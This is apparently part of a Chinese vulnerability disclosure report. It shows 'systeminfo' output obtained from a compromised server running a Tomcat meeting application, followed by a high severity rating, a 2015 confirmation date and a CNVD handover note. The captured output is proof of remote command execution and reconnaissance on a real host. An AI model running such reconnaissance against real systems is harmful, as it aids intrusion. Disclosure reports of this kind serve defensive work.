Dawning系统型号: X8DT6系统类型: x64-based PC处理器: 安装了 2 个处理器。 [01]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~1595 Mhz [02]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~1595 MhzBIOS 版本: American Megatrends Inc. 2.0a , 2010/9/14Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 32,759 MB可用的物理内存: 29,304 MB虚拟内存: 最大值: 65,516 MB虚拟内存: 可用: 60,856 MB虚拟内存: 使用中: 4,660 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: \\WIN-TKJ69DO47HC修补程序: 安装了 1 个修补程序。 [01]: KB976902网卡: 安装了 2 个 NIC。 [01]: Intel(R) 82574L Gigabit Network Connection 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: fe80::51e2:63ee:5c45:3df6 [02]: Intel(R) 82574L Gigabit Network Connection 连接名: 本地连接 2 状态: 媒体连接已中断D:\meeting-tomcat\>
加强安全意识
危害等级:高
漏洞Rank:11
确认时间:2015-11-19 18:56
CNVD未直接复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。
暂无
